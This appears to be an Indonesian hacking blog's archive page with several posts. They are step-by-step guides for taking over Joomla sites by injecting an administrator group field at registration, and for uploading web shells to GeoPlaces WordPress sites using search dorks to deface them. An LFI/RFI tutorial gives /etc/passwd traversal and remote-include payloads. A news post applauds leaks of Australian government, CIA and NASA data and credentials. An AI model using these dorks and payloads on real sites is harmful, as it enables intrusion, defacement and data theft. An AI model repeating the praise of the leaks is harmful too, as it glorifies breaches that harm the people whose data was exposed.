Newest Post

Tampilkan postingan dengan label HackinG. Tampilkan semua postingan
Tampilkan postingan dengan label HackinG. Tampilkan semua postingan

Download Vulnerability Master

| 1/25/2014
Baca selengkapnya »











Link Donlot Ada Di Bawah Silahkan Sedot :)


Download Via {[ Mediafire ]}
Download Via {[ Dropbox ]}

{[ Virus Scan ]}


Thanks Telah Berkunjung Semoga Bermanfaat ;)


Download Vulnerability Master

Posted by : Unknown
Date :1/25/2014
With 0komentar
Tag :

NEW VULNERABILITY IN JOOMLA FULL TUT ( COM_USER )

| 11/16/2013
Baca selengkapnya »
NEW VULNERABILITY IN JOOMLA FULL TUT ( COM_USER )

Celah ini memungkinkan kita untuk meningkatkan hak joomla untuk mendaftarkan

pengguna baru, untuk versi 1.6.x/1.7.x belum diterbitkan sejauh ada patch
versi dan 1.0.x/1.5.x/2.5.3 + tidak rentan. tapi untuk kami
menghibur v 1.5.x (yang tidak ditambal) joomla memiliki bug terkenal token, Anda dapat mengubah admin lulus,
baik itu topik yang lain. : P


Mari kita fokus pada kita sendiri dan mengeksploitasi kerentanan ini xD! Banyak situs menggunakan joomla memilikinya. itu
bug adalah menciptakan kita pengguna baru, tapi sebelum itu kita harus menambahkan parameter
untuk formulir pendaftaran tetapi dapat menggunakan Firebug (Firefox Addon Untuk), terlihat
Situs joomla potensi yang baik dan laten.
Dapatkan Firebug Disini
Dork inurl :/ :: index.php? Option = com_users & pandangan = pendaftaran
Eksploitasi Kode Untuk digunakan dengan Firebug :: <input value="7" name="jform[groups][]" />


[Image: screenshot_285.png]


[Image: screenshot_286.png]


Saya menghapus domain dari halaman tersebut, tetapi dapat menghapusnya dengan melihat logo: P
, Nah kami melihat bahwa ketika melihat kode sumber kita mendapatkan tag META
"Joomla - Open Source Content Management" yang tidak memberitahu kami yang
versi, tapi mungkin bahwa joomla adalah arus atau hampir saat
versi, saya maksud dengan frase tersebut akan diperiksa, namun tidak menjamin bahwa
dapat dengan mudah menghapus atau mengubah, tetapi jika Anda ingin tahu versi yang dapat
mungkin akan menggunakan program CMSEXPLORER yang disertakan dalam distribusi Backtrack. Sekarang mencoba untuk membuat user, kita harus melihat bagian dari pengguna untuk check-in, menulis dalam browser :: P
http://www.site-joomla.com/index.php?opt...gistration

[Image: screenshot_287.png]



Seperti yang saya akan mengisi formulir dengan rincian saya sekarang
menuliskan password saya, saya melakukan ini sehingga ketika saya mengirim parameter mendaftar
(yang kemudian menyuntikkan) untuk tetap terukir dalam sesi rekaman kami, dan menempatkan
sebuah email yang ada dan pada akhirnya mereka mengirimkan pendaftaran
link konfirmasi sekarang menyuntikkan parameter kami hilang dalam pendaftaran
terbentuk dalam rangka untuk mengeksploitasi kerentanan bahagia.
Tekan F12 untuk membuka Firebug dan kemudian mengembangkan langkah-langkah gambar, dan sekarang kita menempatkan kode kecil kami yang hampir di awal tulisan ini.

[Image: screenshot_288.png]


Jika mereka menyadari kode ini di antara tag "<dd> </ dd>" adalah
bahwa versi joomla menggunakan jenis label, maka mungkin menemukan
joomla tanpa tag tersebut, dalam hal ini harus melakukan sebagai struktur dan
melekat padanya, untuk menghindari kegagalan xD! sehubungan dengan kode, jika mereka
menyadari "value = 7", yang memberitahu kita bahwa kita berada di Administrator
kelompok dan bukan grup Super User adalah nilai 8.

[Image: screenshot_289.png]


Yah kita menekan F12 atau meminimalkan pembakar yang kita gunakan tidak lagi, dan melakukan langkah-langkah dalam gambar

[Image: screenshot_290.png]


Setelah memeriksa kita mendapatkan pesan yang mengatakan belum diputuskan memverifikasi dan mengkonfirmasi
pendaftaran email kami disediakan, dan jika tidak ditemukan di daerah
dir spam atau inbox .

[Image: screenshot_291.png]



Setelah mengkonfirmasi administrator panel pendaftaran menyetujui joomla.

http://www.site-joomla.com/administrator dan kami akan masuk.

[Image: screenshot_292.png]

Sumber :)

NEW VULNERABILITY IN JOOMLA FULL TUT ( COM_USER )

Posted by : Unknown
Date :11/16/2013
With 1 komentar:
Tag :

Cara Deface dengan Upload Shell Vulnerability

| 11/15/2013
Baca selengkapnya »
Langsung Sikat Bray :)
Dork    :
inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)" 

Site:: 
- http://site.com/?ptype=post_listing
- http://site.com/?ptype=post_event
- http://site.com/path/?ptype=post_listing
- http://site.com/path/?ptype=post_event 
 
Sebelumnya Rename dulu Shellmu jadi ext. jpg
cth: shell.php.jpg / shell.php;.jpg
Upload shellmu,, gunakan tamper data.  Silahkan Lihat Cara Tamper Data (Upload PHP File) 
 
 
Hasilnya bisa dilihat
- http://site.com/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
- http://site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
 
Video Tutorial 

 

Sumber : http://indocyberarmy.blogspot.com/2013/02/wordpress-geoplaces-themes-shell-upload.html

Cara Deface dengan Upload Shell Vulnerability

Posted by : Unknown
Date :11/15/2013
With 0komentar
Tag :

Cara Deface dengan LFI/RFI

|
Baca selengkapnya »
Buat yg belum tau aja yhaa... klo yg udh jago, mending ga ush di baca... drpd buang2 waktu :tongue:

Sebelumnya apa sih LFI dan RFI itu??

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:



Code:
include();
include_once();
require();
require_once();

Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,


Code:
<?php
  include "../$_GET[imagefile]";
  ?>

misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya

Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.


nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target :lol:

tapi seandainya terdapat error seperti di bawah ini:

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini

Code:
Code:

  <?php
  include($_GET[imagefile].".php");
  ?>

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.

Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi "hacked by n4is3n"

jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.


Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,

Code:
include("./"$_GET[imagefile].".php");

maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.

Semoga tutor sederhana dan sangat awam ini (Maklum, yg nulis jg msh awam) bermanfaat.

Sumber: Hacker Newbie
Edited by : Febri Nur Cahya
Source : http://indocyberarmy.blogspot.com/2013/02/tutor-singkat-rfi-lfi.html

Cara Deface dengan LFI/RFI

Posted by : Unknown
Date :
With 1 komentar:
Tag :

Hacker Indonesia sukses obok-obok data CIA dan NASA

| 11/14/2013
Baca selengkapnya »

Hacker Indonesia sukses obok-obok data CIA dan NASA
Bukan hanya serangan bentuk DDoS dan deface saja yang ternyata bisa dilakukan oleh hacker Indonesia dalam serangan cybernya ke situs pemerintahan Australia. Baru saja, dedemit dunia maya ini juga berhasil mengumpulkan beberapa data rahasia dari CIA Australia.
Pantauan merdeka.com (14/11), hal ini pertama kali diungkap oleh akun Facebook bernama www.facebook.com/steril1337. Akun dengan alias Black'April tersebut membeberkan berbagai data dari database sistem pemerintahan Australia yang kemudian disimpan dalam pastebin.
Beberapa data yang diungkap pun sebenarnya bisa digolongkan kategori rahasia negara. Hal ini karena menyangkut adanya data dari CIA, NASA, dan berbagai misi yang akan diselenggarakan oleh agensi tersebut.
Untuk data yang pertama bocor adalah data mengenai agen CIA Nguyen Ricard. Data ini disalin dalam pastebin http://pastebin.com/7RnbRxa6.
Data yang kedua menyangkut username dan password pemilik akun di Ozi Pilots Online, sebuah situs yang mengindeks berbagai aktivitas terbang para pilot Australia. Data ini dibocorkan dalam http://pastebin.com/7FKJLytP.
Sementara, data mengenai pilot dan misi NASA diungkap melalui http://pastebin.com/Dv95UUwq. Selain itu, banyak lagi yang diungkap dalam pastebin tersebut.
Sampai saat ini sendiri perang cyber yang berkecamuk di Australia belum menunjukkan tanda usai. Hingga kini, hacker Indonesia terus berupaya merontokkan berbagai situs yang jadi afiliasi pemerintahan negeri kanguru tersebut.

Hacker Indonesia sukses obok-obok data CIA dan NASA

Posted by : Unknown
Date :11/14/2013
With 0komentar
Tag :
▲Top▲